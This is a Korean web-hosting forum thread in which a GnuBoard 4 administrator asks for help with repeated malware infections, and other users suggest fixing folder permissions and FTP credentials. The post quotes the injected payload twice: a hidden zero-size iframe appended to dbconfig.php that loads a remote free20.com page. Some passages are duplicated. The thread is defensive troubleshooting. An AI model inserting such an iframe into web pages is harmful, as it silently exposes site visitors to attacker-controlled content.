악성코트 문제입니다.. 도움 부탁 드립니다. 정보
악성코트 문제입니다.. 도움 부탁 드립니다.
본문
서버에 약 10개정도의 도메인을 운영중인데. 그누4로 제작한 홈피들에만 악성코드가 감염 됩니다..
그누3이나 다른것으로 제작된 홈피는 아무 문제 없던데.. 그누4만 걸리네요 벌써 두번재 입니다..
악성코드는 dbconfig.php 와 data/ 아래의 모든 index.php, extend/ 아래의 index.php 에 걸립니다..
내용입니다..
dbconfig.php
<?
$mysql_host = "localhost";
$mysql_user = "xxxxx";
$mysql_password = "xxxxx";
$mysql_db = "xxxxxx";
?>
$mysql_host = "localhost";
$mysql_user = "xxxxx";
$mysql_password = "xxxxx";
$mysql_db = "xxxxxx";
?>
<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspac
e=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspac
e=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
설정아래의 iframe 입니다..
막을 방법 없을까요?
해킹을 의심했지만 ssh 포트도 다른것으로 바꾸고 비번 정리는 1주일 단위로 16문자 이내로 변경 하고 있습니다.
사용자들은 ftp만 접속되고 ssh는 관리자 한사람만 접속후 root권한으로 재접 합니다..
서버보안에는 문제가 없는것 t같은데....
유독 그누4로제작한 사이트들에만 걸립니다..
도움 부탁 드립니다..
감사합니다.
댓글 전체
계속 걸린다는 data 와 extend 폴더는 보통 접속권한이 777 일텐데 이 폴더의
권한을 바꿔보는게 좋을듯합니다
권한을 바꿔보는게 좋을듯합니다
기존 파일을 덮어쓰는 것도 아니고 기존 소스에 코드를 추가하여 다시 기록한다면...
서버 해킹이 아니라면 ftp 아이디 비번이 유출되었을 가능성에 무게를 두고 싶네요.
원인을 빨리 찾으시길...
서버 해킹이 아니라면 ftp 아이디 비번이 유출되었을 가능성에 무게를 두고 싶네요.
원인을 빨리 찾으시길...
저도 조금 전까지 똑 같은 경우를 겪었습니다.
어제부터 접속자현황에 (IP) 66.249.73.100 (브라우저) Robot (OS) Robot 이것이 생기더니
현재접속자 조회에서도 이 아이피가 온 게시판을 돌아다니는 것이 나타났었습니다.
그리고 오늘 낮부터 로그인 조차 되지 않더라구요.
또 내 홈피에 접속을 하면 브라우저 상태표시줄에 www.free20.com에 접속을 하는 메시지가 떴었습니다.
접속이 거의 되지 않을 만큼 속도가 떨어졌었구요.
게다가 apache 계정의 디렉토리에는 index.php 라는 파일을 하나씩 만들어 두었고,
파일의 내용은 위의 빨간 글자의 것이었습니다.
또 apache 계정으로 만들어진 모든 파일의 맨끝 부분에도 위의 빨간 글자의 것이 덧붙여져 있었습니다.
그 해당 파일과 덧붙여진 내용을 다지우고, iptables등으로 아이피를 막아도 여전히 현재접속자에 남아있었습니다.
그래서 계정(개인적인 홈피라 계정이 몇개 안됩니다)의 암호를 다 바꾸었더니 지금은 더 이상 나타나지 않습니다.
아마 테스트용으로 간단하게 만들어 놓은 계정의 암호를 알아낸 것이 아닌가 생각됩니다만,
근데 그 계정으로 ftp가 되지 않거든요. 익명도 되지 않고...
암튼 황당했습니다.
어제부터 접속자현황에 (IP) 66.249.73.100 (브라우저) Robot (OS) Robot 이것이 생기더니
현재접속자 조회에서도 이 아이피가 온 게시판을 돌아다니는 것이 나타났었습니다.
그리고 오늘 낮부터 로그인 조차 되지 않더라구요.
또 내 홈피에 접속을 하면 브라우저 상태표시줄에 www.free20.com에 접속을 하는 메시지가 떴었습니다.
접속이 거의 되지 않을 만큼 속도가 떨어졌었구요.
게다가 apache 계정의 디렉토리에는 index.php 라는 파일을 하나씩 만들어 두었고,
파일의 내용은 위의 빨간 글자의 것이었습니다.
또 apache 계정으로 만들어진 모든 파일의 맨끝 부분에도 위의 빨간 글자의 것이 덧붙여져 있었습니다.
그 해당 파일과 덧붙여진 내용을 다지우고, iptables등으로 아이피를 막아도 여전히 현재접속자에 남아있었습니다.
그래서 계정(개인적인 홈피라 계정이 몇개 안됩니다)의 암호를 다 바꾸었더니 지금은 더 이상 나타나지 않습니다.
아마 테스트용으로 간단하게 만들어 놓은 계정의 암호를 알아낸 것이 아닌가 생각됩니다만,
근데 그 계정으로 ftp가 되지 않거든요. 익명도 되지 않고...
암튼 황당했습니다.
답변 갑사합니다..
우선 ftp변경을 해야 겠습니다..
우선 ftp변경을 해야 겠습니다..
